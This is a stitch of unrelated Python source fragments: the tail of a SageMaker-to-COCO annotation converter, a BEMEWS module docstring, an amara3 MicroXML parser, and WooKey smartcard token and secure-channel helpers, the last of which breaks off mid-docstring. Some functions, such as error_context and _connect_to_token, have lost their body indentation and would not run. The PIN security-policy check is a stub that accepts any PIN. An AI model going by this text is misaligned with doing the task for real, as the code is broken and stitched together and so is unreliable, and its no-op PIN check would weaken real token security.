            # The annotation payload is doubly JSON-encoded by SageMaker.
            annotationData = json.loads(
                json.loads(
                    image_data["consolidatedAnnotation"]["content"][taskName][
                        "annotationsFromAllWorkers"
                    ][0]["annotationData"]["content"]
                )["annotations"]
            )
            # code correct until this point
            # The single COCO category is taken from the first annotation seen.
            if len(cocoOutput["categories"]) == 0 and len(annotationData) > 0:
                label = annotationData[0]["class"]
                cocoOutput["categories"].append(
                    {
                        "id": CAT_TO_ID[label],
                        "name": label,
                        "supercategory": "",
                        "color": CAT_TO_COLOR[label],
                        "metadata": {},
                        "keypoint_colors": [],
                    }
                )
            # Image is loaded only to obtain its height/width.
            img = cv2.imread(alphabetizedImgList[imgId])
            # img = imageio.imread(io.BytesIO(base64.b64decode(annotationData[
            #  'labeledImage']['pngImageData'])))
            # cv2_img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
            # # cv2.imshow('testing', cv2_img)
            # # cv2.waitKey(0)
            imageData = {
                "id": imgId,
                "path": alphabetizedImgList[imgId],
                "height": img.shape[0],
                "width": img.shape[1],
                "file_name": imgName,
                "worker_id": workerId,
                "annotated": False,
                "annotating": [],
                "num_annotations": 0,
                "metadata": {},
                "deleted": False,
                "milliseconds": 0,
                "events": [],
                "regenerate_thumbnail": False,
            }
            cocoOutput["images"].append(imageData)
            # One COCO annotation per instance; polygon 0 is the outline,
            # subsequent polygons are treated as holes (area subtracted).
            for i, instance in enumerate(annotationData):
                runningArea = 0
                # polygonPts = np.multiply(np.asarray(instance['data']).flatten(), img.shape[1] / 1200)
                # polygonPts = np.multiply(np.asarray([[4, 3, 1, 5], [7, 4, 5, 3]]).flatten(), img.shape[1] / 1200)
                # polygonPts = np.multiply(np.asarray([[int(el) for el in annot[
                #  'segmentation'][0]]))
                polygonPts = np.asarray(instance["points"])
                blankImg = Image.new("L", tuple(reversed(img.shape[0:2])), 0)
                for j, seg in enumerate(polygonPts):
                    if j == 0:
                        ImageDraw.Draw(blankImg).polygon(
                            [int(el) for el in seg], outline=1, fill=1
                        )
                        fortran_ground_truth_binary_mask = np.asfortranarray(blankImg)
                        encoded_ground_truth = mask.encode(fortran_ground_truth_binary_mask)
                        runningArea += mask.area(encoded_ground_truth)
                        ground_truth_bounding_box = mask.toBbox(encoded_ground_truth)
                    else:
                        ImageDraw.Draw(blankImg).polygon(
                            [int(el) for el in seg], outline=i, fill=i
                        )
                        fortran_ground_truth_binary_mask = np.asfortranarray(blankImg)
                        encoded_ground_truth = mask.encode(fortran_ground_truth_binary_mask)
                        runningArea -= mask.area(encoded_ground_truth)
                annotation = {
                    "segmentation": [],
                    "metadata": {},
                    "area": runningArea.tolist(),
                    "iscrowd": False,
                    "isbbox": False,
                    "image_id": imgId,
                    "bbox": ground_truth_bounding_box.tolist(),
                    "category_id": CAT_TO_ID[instance["class"]],
                    "id": instance_id,
                    "color": "#{:02x}{:02x}{:02x}".format(r(), r(), r()),
                }
                instance_id += 1
                for seg in polygonPts:
                    annotation["segmentation"].append(seg.tolist())
                # for contour in contours:
                #     contour = np.flip(contour, axis=1)
                #     segmentation = contour.ravel().tolist()
                #     annotation["segmentation"].append(segmentation)
                # how many levels of nesting are correct?
                # only two because each instance can have one or more segmentations
                # why are there three levels now?
                cocoOutput["annotations"].append(annotation)
                # # blankImg = Image.new("L", tuple(reversed(img.shape[0:2])), 0)
                # # ImageDraw.Draw(blankImg).polygon([int(el) for el in annotation[
                # # 'segmentation'][0]], outline=1, fill=1)
                # # reconstructedMask = np.array(blankImg)
                # # cv2.imshow('reconstructedMask', 255*reconstructedMask)
                # # cv2.waitKey(0)
    # Rewritten after every annotation file; the final file holds everything.
    with open("%s_labels_fromAmzn_%s.json" % (label, taskName), "w") as f:
        json.dump(cocoOutput, f, ensure_ascii=False, indent=4)
# Optionally write an amended manifest that omits already-annotated images.
if opts.remove_completed_from_manifest:
    with open(f'{opts.manifest.split(".jsonl")[0]}_amended.jsonl', 'w') as f:
        for image_name in labelledImgs:
            if image_name not in completed_images:
                f.write(f'{{"source-ref":"s3://egg-laying/images/{image_name}"}}\n')
    if opts.worker_ignore_list:
        print(f'Omitted {num_images_ignored} from the new version of the manifest file.')
"""
The Building Energy Modeling Extreme Weather Simulator (BEMEWS)
weather module reads in, alters, and writes out weather files
to account for extreme events or climate change.
"""
from mews.weather.alter import Alter
|
#amara3.uxml.parser
'''
Hand-crafted parser for MicroXML [1], inspired to some extent by James Clark's Javascript work [2].
[1] https://dvcs.w3.org/hg/microxml/raw-file/tip/spec/microxml.html
[2] https://github.com/jclark/microxml-js/blob/master/microxml.js
'''
import re
from enum import Enum #https://docs.python.org/3.4/library/enum.html
from amara3.util import coroutine
class state(Enum):
    """Parser state machine positions within the MicroXML grammar."""
    pre_element = 1
    in_element = 2
    pre_tag_gi = 3
    pre_complete_tag_gi = 4
    tag_gi = 5
    complete_tag = 6
    complete_doc = 7
    attribute = 8
class event(Enum):
    """Event types emitted to the handler coroutine."""
    start_element = 1
    end_element = 2
    characters = 3
BOM = '\uFEFF'
# One allowed MicroXML character (spec production CHAR).
CHARACTER = re.compile('[\u0009\u000a\u0020-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
    '\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
    '\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
    '\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
#MicroXML production [7] Basically CHARACTER - [\u0026\u003C\u003E]
DATACHAR = re.compile('[\u0009\u000a\u0020-\u0025\u0027-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
    '\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
    '\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
    '\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
NAMESTARTCHAR = re.compile('[A-Za-z_\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D' \
    '\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF' \
    '\uF900-\uFDCF\uFDF0-\uFFFD\U00010000-\U000EFFFF]')
# NOTE(review): the '\u00B7-\u00C0-\u00D6' run below chains two ranges through
# \u00C0 — looks like a typo inherited from the spec transcription; confirm.
NAMECHAR = re.compile('[0-9A-Za-z_\u00B7-\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u037D' \
    '\u037F-\u1FFF\u200C-\u200D\u203F-\u2040\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF' \
    '\uF900-\uFDCF\uFDF0-\uFFFD\U00010000-\U000EFFFF]')
#For single quoted attrs
ATTRIBVALCHAR_SGL = re.compile('[\u0020-\u0025\u0028-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
    '\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
    '\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
    '\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
#For double quoted attrs
ATTRIBVALCHAR_DBL = re.compile('[\u0020-\u0021\\\u0023-\u0025\u0027-\u003B\u003D\u003F-\u007e\u00a0-\ud7ff\ue000-\ufdcf\ufdf0-\ufffd' \
    '\U00010000-\U0001fffd\U00020000-\U0002fffd\U00030000-\U0003fffd\U00040000-\U0004fffd\U00050000-\U0005fffd\U00060000-\U0006fffd' \
    '\U00070000-\U0007fffd\U00080000-\U0008fffd\U00090000-\U0009fffd\U000a0000-\U000afffd\U000b0000-\U000bfffd\U000c0000-\U000cfffd' \
    '\U000d0000-\U000dfffd\U000e0000-\U000efffd\U000f0000-\U000ffffd\U00100000-\U0010fffd]')
# Tokens
WS = '[\u0009\u000A\u0020]'
HEXCHARENTOK = re.compile('[a-fA-F0-9]')
NAMEDCHARENTOK = re.compile('[a-zA-Z0-9]')
#In order of length
CHARNAMES = (('lt', "<"), ('gt', ">"), ('amp', "&"), ('quot', '"'), ('apos', "'"))
#CHARNAMES = { 'lt': "<", 'gt': ">", 'amp': "&", 'quot': '"', 'apos': "'"}
#Make this one a utility function since we'll hope to make the transition into reading cdata rarely enough to endure the function-call overhead
def handle_cdata(pos, window, charpat, stopchars):
    '''
    Scan character data (element text or an attribute value) starting at *pos*.

    Return (result, new_position) tuple.
    Result is cdata string if possible and None if more input is needed
    (the caller should backtrack and feed more text).
    Or of course bad syntax can raise a RuntimeError.

    pos       - index into *window* where scanning starts
    window    - the full buffered text seen so far
    charpat   - compiled regex matching a single allowed literal character
    stopchars - characters terminating the run (e.g. '<' or a quote char)
    '''
    cdata = ''
    cursor = start = pos
    try:
        while True:
            # Consume a run of plain allowed characters.
            while charpat.match(window[cursor]):
                cursor += 1
            addchars = window[start:cursor]
            cdata += addchars
            if window[cursor] in stopchars:
                return cdata, cursor
            #Check for charref
            elif window[cursor] == '&':
                start = cursor = cursor + 1
                if window[cursor] == '#' and window[cursor + 1] == 'x':
                    #Numerical (hex) charref
                    start = cursor = cursor + 2
                    while True:
                        if HEXCHARENTOK.match(window[cursor]):
                            cursor += 1
                        elif window[cursor] == ';':
                            c = chr(int(window[start:cursor], 16))
                            if not CHARACTER.match(c):
                                raise RuntimeError('Character reference gives an illegal character: {0}'.format('&' + window[start:cursor] + ';'))
                            cdata += c
                            break
                        else:
                            raise RuntimeError('Illegal in character entity: {0}'.format(window[cursor]))
                else:
                    #Named charref
                    while True:
                        if NAMEDCHARENTOK.match(window[cursor]):
                            cursor += 1
                        elif window[cursor] == ';':
                            for cn, c in CHARNAMES:
                                if window[start:cursor] == cn:
                                    cdata += c
                                    break
                            else:
                                raise RuntimeError('Unknown named character reference: {0}'.format(repr(window[start:cursor])))
                            break
                        else:
                            # BUG FIX: error_context(...) was previously passed to
                            # RuntimeError instead of .format(), so this raise
                            # crashed with IndexError ("{1}" had no argument).
                            raise RuntimeError('Illegal in character reference: {0} (around {1})'.format(
                                window[cursor], error_context(window, start, cursor)))
            # Skip the terminating ';' (or the unmatched character) and resume.
            cursor += 1
            start = cursor
    except IndexError:
        # Ran off the end of the window: signal that more input is needed.
        return None, cursor
def error_context(window, start, end, size=10):
return window[max(0, start-size):min(end+size, len(window))]
@coroutine
def parser(handler, strict=True):
    '''
    Incremental MicroXML parser coroutine.

    Receives (fragment, done) tuples via send(); buffers fragments in *window*
    and drives a state machine over it, sending (event, ...) tuples to the
    *handler* coroutine. When input runs out mid-construct, the position is
    left (or reset) so parsing resumes once more text arrives.
    '''
    next(handler) #Prime the coroutine
    #abspos = 0
    line_count = 1
    col_count = 1
    window = ''          # all text buffered so far
    pos = 0              # current scan position within window
    wlen = 0             # cached len(window)
    backtrack = 0
    curr_state = state.pre_element
    done = False
    element_stack = []   # open element names, for matching close tags
    attribs = {}         # attributes of the tag currently being read
    try:
        try:
            while not done:
                #import pdb; pdb.set_trace()
                frag, done = yield
                #print(frag, done)
                if not frag: continue #Ignore empty additions
                window += frag
                wlen += len(frag)
                #FIXME: throw away unneeded, prior bits of window here
                need_input = False
                # Inner loop: advance through states until more input is needed.
                while not need_input:
                    if curr_state == state.pre_element:
                        #Eat up any whitespace
                        try:
                            while window[pos] in ' \r\n\t':
                                pos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            continue
                        #if not done and pos == wlen:
                        #    need_input = True
                        #    continue
                        if window[pos] == '<':
                            pos += 1
                            curr_state = state.pre_tag_gi
                        #if not done and pos == wlen:
                        #    need_input = True
                        #    continue
                    if curr_state in (state.pre_tag_gi, state.pre_complete_tag_gi):
                        pending_event = event.start_element if curr_state == state.pre_tag_gi else event.end_element
                        #Eat up any whitespace
                        try:
                            while window[pos] in ' \r\n\t':
                                pos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            continue
                        if curr_state == state.pre_tag_gi and window[pos] == '/':
                            pos += 1
                            curr_state = state.pre_complete_tag_gi
                            pending_event = event.end_element
                            continue
                        #if not done and pos == wlen:
                        #    need_input = True
                        #    continue
                        # Scan the element name (generic identifier).
                        advpos = pos
                        try:
                            if NAMESTARTCHAR.match(window[advpos]):
                                advpos += 1
                                while NAMECHAR.match(window[advpos]):
                                    advpos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            continue
                        else:
                            gi = window[pos:advpos]
                            pos = advpos
                            curr_state = state.complete_tag
                    if curr_state == state.complete_tag:
                        #Eat up any whitespace
                        try:
                            while window[pos] in ' \r\n\t':
                                pos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            continue
                        #Check for attributes
                        if pending_event == event.start_element and NAMESTARTCHAR.match(window[pos]):
                            curr_state = state.attribute
                            #Note: pos not advanced so we can re-read startchar
                            continue
                        if window[pos] == '>':
                            pos += 1
                            curr_state = state.in_element
                            attribs_out = attribs.copy()
                            attribs = {} # Reset attribs
                            if pending_event == event.start_element:
                                handler.send((pending_event, gi, attribs_out, element_stack.copy()))
                                element_stack.append(gi)
                            else:
                                opened = element_stack.pop()
                                if opened != gi:
                                    raise RuntimeError('Expected close element {0}, found {1}'.format(opened, gi))
                                handler.send((pending_event, gi, element_stack.copy()))
                                if not element_stack: #and if strict
                                    curr_state = state.complete_doc
                            if pos == wlen:
                                if done:
                                    #Error: unfinished business if this is opening tag
                                    break
                                else:
                                    need_input = True
                                    continue
                        else:
                            raise RuntimeError('Expected \'>\', found {0}'.format(window[pos]))
                    if curr_state == state.attribute:
                        # backtrackpos lets us rewind the whole attribute on partial input.
                        backtrackpos = pos
                        advpos = pos+1 #Skip 1st char, which we know is NAMESTARTCHAR
                        try:
                            while NAMECHAR.match(window[advpos]):
                                advpos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            pos = backtrackpos
                            continue
                        else:
                            aname = window[pos:advpos]
                            pos = advpos
                        #Eat up any whitespace
                        try:
                            while window[pos] in ' \r\n\t':
                                pos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            pos = backtrackpos
                            continue
                        if window[pos] == '=':
                            pos += 1
                        else:
                            raise RuntimeError('Expected \'=\', found {0} (around {1})'.format(window[pos], error_context(window, pos, pos)))
                        if not done and pos == wlen:
                            need_input = True
                            pos = backtrackpos
                            continue
                        if window[pos] in '"\'':
                            openattr = window[pos]
                            attrpat = ATTRIBVALCHAR_SGL if openattr == "'" else ATTRIBVALCHAR_DBL
                            #backtrackpos = pos
                            #pos + 1 to skip the opening quote
                            aval, newpos = handle_cdata(pos+1, window, attrpat, openattr)
                            if aval == None:
                                if not done: need_input = True
                                #Don't advance to newpos, so effectively backtrack
                                continue
                            #if window[pos] != openattr:
                            #    raise RuntimeError('Mismatch in attribute quotes')
                            pos = newpos + 1 #Skip the closing quote
                            attribs[aname] = aval
                            curr_state = state.complete_tag
                    if curr_state == state.in_element:
                        chars, newpos = handle_cdata(pos, window, DATACHAR, '<')
                        if chars == None:
                            if not done: need_input = True
                            #Don't advance to newpos, so effectively backtrack
                            continue
                        pos = newpos
                        if chars: handler.send((event.characters, chars))
                        if window[pos] == '<':
                            pos += 1
                            #advpos = pos
                            #if not done and pos == wlen:
                            #    need_input = True
                            #    continue
                            curr_state = state.pre_tag_gi
                    if curr_state == state.complete_doc:
                        if pos == wlen:
                            break #All done!
                        #Eat up any whitespace
                        try:
                            while window[pos] in ' \r\n\t':
                                pos += 1
                        except IndexError:
                            if not done: need_input = True #Do not advance until we have enough input
                            continue
                        #if not done and pos == wlen:
                        #    need_input = True
                        #    continue
                        if pos == wlen:
                            break
                        else:
                            raise RuntimeError('Junk after document element')
            #print('END1')
        #print('END2')
        sentinel = yield #Avoid StopIteration in parent from running off end of coroutine?
    except GeneratorExit:
        #close() called
        pass #Any cleanup
    except StopIteration:
        pass #Any cleanup
    return
'''
echo "from amara3.uxml.parser import parsefrags" > /tmp/spam.py
echo "for e in parsefrags(('<spa', 'm>eggs</spam>')): print(e)" >> /tmp/spam.py
#Replace 173 with the position of the line: if curr_state == state.pre_element
python -m pdb -c "b /Users/uche/.local/venv/py3/lib/python3.3/site-packages/amara3/uxml/parser.py:173" /tmp/spam.py
'''
@coroutine
def handler(accumulator):
    """Coroutine sink: append every received parse event to *accumulator*."""
    while True:
        received = yield
        accumulator.append(received)
    return
def parse(text):
    """Parse a complete MicroXML document string, yielding parse events."""
    events = []
    sink = handler(events)
    source = parser(sink)
    source.send((text, True))
    source.close()
    sink.close()
    yield from events
def parsefrags(textfrags):
    """Parse a document supplied as an iterable of text fragments, yielding events."""
    events = []
    sink = handler(events)
    source = parser(sink)
    for frag in textfrags:
        source.send((frag, False))
    source.send(('', True))  # signal end of input
    source.close()
    sink.close()
    yield from events
|
# Various utils and helpers related to the WooKey tokens
from smartcard.CardType import AnyCardType
from smartcard.CardRequest import CardRequest
from smartcard.util import toHexString, toBytes
import datetime
from copy import deepcopy
from common_utils import *
from crypto_utils import *
# Helper to communicate with the smartcard
def _connect_to_token(verbose=True):
card = None
try:
card = connect_to_smartcard(verbose)
except:
card = None
return card
def connect_to_token(token_type=None):
    """Block until a token card is inserted and return its card service.

    token_type: expected token flavor ("auth", "dfu" or "sig"). When given,
    the matching applet is selected to verify the right token was inserted;
    on mismatch, None is returned. When None (the default), the applet
    check is skipped — the original code crashed on token_type.lower()
    in that case.
    """
    card = None
    while card == None:
        err_msg = "Error: Token undetected."
        if token_type != None:
            err_msg += " Please insert your '"+token_type+ "' token ..."
        card = _connect_to_token(verbose=False)
        if card == None:
            sys.stderr.write('\r'+err_msg)
            sys.stderr.flush()
            time.sleep(1)
    if (card != None) and (token_type != None):
        # Check if we have the proper applet
        resp, sw1, sw2 = token_ins(token_type.lower(), "TOKEN_INS_SELECT_APPLET").send(card, verbose=False)
        if (sw1 != 0x90) or (sw2 != 0x00):
            sys.stderr.write('\r'+"Bad token inserted! Please insert the proper '"+token_type+"' token ...")
            sys.stderr.flush()
            time.sleep(1)
            card = None
    return card
# Helper to check the entropy of a string
def check_pin_security_policy(instr):
    """Validate a candidate PIN against the security policy.

    NOTE(review): currently a stub that accepts every PIN — no entropy
    or length check is actually performed yet.
    """
    return True
# Send an APDU using the smartcard library
def send_apdu(cardservice, apdu, verbose=True):
    """Transmit a hex-encoded APDU to the card and return (response, sw1, sw2).

    cardservice: connected smartcard service (see connect_to_smartcard).
    apdu: the APDU as a hex string; it is unhexlified before transmission.
    Returns the response body as a byte-per-character string plus the two
    ISO7816 status words.
    NOTE(review): the chr()/ord() round-trips assume Python 2 string
    semantics (str as byte string) — confirm before porting.
    """
    apdu = local_unhexlify(apdu)
    # Time the exchange for the verbose report below
    a = datetime.datetime.now()
    to_transmit = [ord(x) for x in apdu]
    response, sw1, sw2 = cardservice.connection.transmit(to_transmit)
    b = datetime.datetime.now()
    delta = b - a
    if verbose == True:
        print("> "+local_hexlify(apdu))
        print("< SW1=%02x, SW2=%02x, %s" % (sw1, sw2, local_hexlify(''.join([chr(r) for r in response]))))
        print(" |= APDU took %d ms" % (int(delta.total_seconds() * 1000)))
    return "".join(map(chr, response)), sw1, sw2
# Connect to a smartcard
def connect_to_smartcard(verbose=True):
    """Wait (0.2s timeout) for any card, connect, and return the card service.

    The underlying smartcard library raises if no card shows up in time;
    callers (see _connect_to_token) treat that as "no card".
    """
    cardtype = AnyCardType()
    cardrequest = CardRequest(timeout=.2, cardType=cardtype)
    cardservice = cardrequest.waitforcard()
    cardservice.connection.connect()
    # ATR identifies the card; printed for diagnostics only
    atr = cardservice.connection.getATR()
    if verbose == True:
        print("ATR: "+toHexString(atr))
    return cardservice
# Decrypt the local pet key using PBKDF2 using the external token
def dec_local_pet_key_with_token(pet_pin, salt, pbkdf2_iterations, enc_master_symmetric_local_pet_key, card, data_type):
    """Derive the master symmetric local 'pet key' with the external token.

    PBKDF2-SHA-512(pet_pin, salt) is computed locally and sent to the token,
    which derives and returns the local pet key. Exits the program on any
    token error or when no card is provided.
    NOTE(review): enc_master_symmetric_local_pet_key is currently unused
    here — the token performs the derivation instead; confirm with callers.
    """
    ## Master symmetric 'pet key' to be used for local credential encryption on the platform
    # Use PBKDF2-SHA-512 to derive our local encryption keys
    dk = local_pbkdf2_hmac('sha512', pet_pin, salt, pbkdf2_iterations)
    master_symmetric_local_pet_key = None
    if (card != None):
        # Ask for the token to derive and get the local key
        resp, sw1, sw2 = token_ins(data_type, "TOKEN_INS_SELECT_APPLET").send(card)
        if (sw1 != 0x90) or (sw2 != 0x00):
            print("Token Error: bad response from the token when selecting applet")
            # This is an error
            sys.exit(-1)
        master_symmetric_local_pet_key, sw1, sw2 = token_ins(data_type, "TOKEN_INS_DERIVE_LOCAL_PET_KEY", data=dk).send(card)
        if (sw1 != 0x90) or (sw2 != 0x00):
            print("Token Error: bad response from the token when asking to derive local pet key")
            # This is an error
            sys.exit(-1)
    else:
        # Typo fixed in the message below ("cannont" -> "cannot")
        print("Token Error: card cannot be None ...")
        # This is an error
        sys.exit(-1)
    return master_symmetric_local_pet_key
# Decrypt our local private data
def decrypt_platform_data_with_token(encrypted_platform_bin_file, pin, data_type, card):
    """Decrypt the platform keys file, delegating pet-key derivation to the token."""
    return decrypt_platform_data(encrypted_platform_bin_file, pin, data_type, override_local_pet_key_handler = dec_local_pet_key_with_token, card = card)
# This class handles forging APDUs
# NOTE: we only support *short APDUs*, which is sufficient
# for handling our custom secure channel.
class APDU:
    """A short ISO7816-4 APDU (CLA INS P1 P2 [Lc data] [Le]) that can forge
    its wire representation and send itself over a card connection."""
    cla = None
    ins = None
    p1 = None
    p2 = None
    # data: command payload as a byte-per-char string, or None when absent
    data = None
    # le: expected response length, or None when absent
    le = None
    apdu_buf = None
    def send(self, cardservice, verbose=True):
        """Serialize the APDU and transmit it; return (response, sw1, sw2)."""
        # Guard the length checks with None tests: the original called
        # len(self.data) unconditionally and crashed when an instruction
        # carrying no payload was sent directly.
        if ((self.data != None) and (len(self.data) > 255)) or ((self.le != None) and (self.le > 256)):
            print("APDU Error: data or Le too large")
            sys.exit(-1)
        # Le of 256 is encoded as 0x00 in short APDUs
        if self.le == 256:
            self.le = 0
        # Forge the APDU buffer provided our data
        # CLA INS P1 P2
        self.apdu_buf = chr(self.cla)+chr(self.ins)+chr(self.p1)+chr(self.p2)
        # Do we have data to send?
        if self.data != None:
            self.apdu_buf += chr(len(self.data))
            self.apdu_buf += self.data
            if self.le != None:
                self.apdu_buf += chr(self.le)
        else:
            if self.le != None:
                self.apdu_buf += chr(self.le)
            else:
                self.apdu_buf += '\x00'
        # Send the APDU through the communication channel
        resp, sw1, sw2 = send_apdu(cardservice, local_hexlify(self.apdu_buf), verbose=verbose)
        return (resp, sw1, sw2)
    def __init__(self, cla, ins, p1, p2, data, le):
        self.cla = cla
        self.ins = ins
        self.p1 = p1
        self.p2 = p2
        self.data = data
        self.le = le
        return
# The common instructions
def token_common_instructions(applet_id):
    """Return the APDU map shared by all token flavors.

    applet_id: hex string of the applet AID, embedded in the SELECT command.
    Each entry is a template APDU; token_ins() deep-copies entries before
    filling in per-call data.
    """
    return {
             'TOKEN_INS_SELECT_APPLET'      : APDU(0x00, 0xA4, 0x04, 0x00, local_unhexlify(applet_id), 0x00),
             'TOKEN_INS_SECURE_CHANNEL_INIT': APDU(0x00, 0x00, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_UNLOCK_PET_PIN'     : APDU(0x00, 0x01, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_UNLOCK_USER_PIN'    : APDU(0x00, 0x02, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_SET_USER_PIN'       : APDU(0x00, 0x03, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_SET_PET_PIN'        : APDU(0x00, 0x04, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_SET_PET_NAME'       : APDU(0x00, 0x05, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_USER_PIN_LOCK'      : APDU(0x00, 0x06, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_FULL_LOCK'          : APDU(0x00, 0x07, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_GET_PET_NAME'       : APDU(0x00, 0x08, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_GET_RANDOM'         : APDU(0x00, 0x09, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_DERIVE_LOCAL_PET_KEY': APDU(0x00, 0x0a, 0x00, 0x00, None, 0x00),
             # FIXME: to be removed, for debug purposes only!
             'TOKEN_INS_ECHO_TEST'          : APDU(0x00, 0x0b, 0x00, 0x00, None, 0x00),
             'TOKEN_INS_SECURE_CHANNEL_ECHO': APDU(0x00, 0x0c, 0x00, 0x00, None, 0x00),
    }
# Per-token-type instruction tables, merged on top of the common set by
# token_ins(). INS bytes: 0x1x = AUTH, 0x2x = DFU, 0x3x = SIG.
# The AUTH token instructions
auth_token_instructions = {
    'TOKEN_INS_GET_KEY'                : APDU(0x00, 0x10, 0x00, 0x00, None, 0x00),
}
# The DFU token instructions
dfu_token_instructions = {
    'TOKEN_INS_BEGIN_DECRYPT_SESSION'  : APDU(0x00, 0x20, 0x00, 0x00, None, 0x00),
    'TOKEN_INS_DERIVE_KEY'             : APDU(0x00, 0x21, 0x00, 0x00, None, 0x00),
}
# The SIG token instructions
sig_token_instructions = {
    'TOKEN_INS_BEGIN_SIGN_SESSION'     : APDU(0x00, 0x30, 0x00, 0x00, None, 0x00),
    'TOKEN_INS_DERIVE_KEY'             : APDU(0x00, 0x31, 0x00, 0x00, None, 0x00),
    'TOKEN_INS_SIGN_FIRMWARE'          : APDU(0x00, 0x32, 0x00, 0x00, None, 0x00),
    'TOKEN_INS_VERIFY_FIRMWARE'        : APDU(0x00, 0x33, 0x00, 0x00, None, 0x00),
    'TOKEN_INS_GET_SIG_TYPE'           : APDU(0x00, 0x34, 0x00, 0x00, None, 0x00),
}
def token_ins(token_type, instruction, data=None, lc=None):
    """Return a fresh APDU for `instruction` on the given token type.

    The returned APDU is a deep copy of the template, optionally populated
    with `data`; callers may freely mutate it.
    """
    # Applet AID and instruction-table per token flavor
    applet_ids = {
        "auth": "45757477747536417070",
        "dfu" : "45757477747536417071",
        "sig" : "45757477747536417072",
    }
    specific_instructions = {
        "auth": auth_token_instructions,
        "dfu" : dfu_token_instructions,
        "sig" : sig_token_instructions,
    }
    if token_type not in applet_ids:
        print("Error: unknown token type "+token_type)
        sys.exit(-1)
    token_instructions = token_common_instructions(applet_ids[token_type]).copy()
    token_instructions.update(specific_instructions[token_type])
    apdu = deepcopy(token_instructions[instruction])
    if (apdu.data is None) and (data is not None):
        apdu.data = data
    if lc is not None:
        apdu.lc = lc
    return apdu
# PIN padding
def pin_padding(pin):
    """Pad `pin` to 16 chars: NUL-fill to 15 bytes, then append the length byte."""
    pin_len = len(pin)
    if pin_len > 15:
        print("PIN Error: bad length (> 15) %d" % (pin_len))
        sys.exit(-1)
    return pin + ("\x00" * (15 - pin_len)) + chr(pin_len)
# Secure channel class
class SCP:
    """Secure channel protocol (SCP) session with a WooKey token.

    The channel is mounted by an ECDSA-authenticated ECDH exchange with the
    token (see __init__); afterwards every command is AES-CTR encrypted and
    HMAC-SHA256 authenticated, with a 128-bit IV acting as the CTR counter
    that both sides increment in lockstep.

    NOTE(review): byte strings are built with chr()/ord() concatenation,
    which matches Python 2 string semantics — confirm before porting.
    """
    initialized = False
    cardservice = None
    IV = None
    first_IV = None
    AES_Key = None
    HMAC_Key = None
    dec_firmware_sig_pub_key_data = None
    token_type = None
    pbkdf2_salt = None
    pbkdf2_iterations = None
    # Update the sessions keys (on some triggers such as provide/modify a PIN)
    def session_keys_update(self, pin):
        """XOR-mask the AES and HMAC session keys with SHA-256(pin || current IV)."""
        (mask, _, _) = local_sha256(pin+self.IV)
        self.AES_Key = expand(inttostring(stringtoint(self.AES_Key) ^ stringtoint(mask[:16])), 128, "LEFT")
        self.HMAC_Key = expand(inttostring(stringtoint(self.HMAC_Key) ^ stringtoint(mask)), 256, "LEFT")
        return
    # Encrypt/decrypt data with a key derived from the PIN
    def pin_decrypt_data(self, pin, data, iv):
        """AES-CBC decrypt `data` under a key derived from the PIN and the first IV."""
        (h, _, _) = local_sha256(pin)
        (key, _, _) = local_sha256(self.first_IV+h)
        key = key[:16]
        aes = local_AES.new(key, AES.MODE_CBC, iv=iv)
        dec_data = aes.decrypt(data)
        return dec_data
    def pin_encrypt_data(self, pin, data, iv):
        """AES-CBC encrypt `data` under a key derived from the PIN and the first IV."""
        (h, _, _) = local_sha256(pin)
        (key, _, _) = local_sha256(self.first_IV+h)
        key = key[:16]
        aes = local_AES.new(key, AES.MODE_CBC, iv=iv)
        enc_data = aes.encrypt(data)
        return enc_data
    # Send a message through the secure channel
    def send(self, orig_apdu, pin=None, update_session_keys=False, pin_decrypt=False):
        """Encrypt and authenticate `orig_apdu`, transmit it, then verify and
        decrypt the answer.

        Returns (decrypted_data, sw1, sw2), or (None, None, None) on any
        channel error. `pin` must be provided when update_session_keys or
        pin_decrypt is requested.
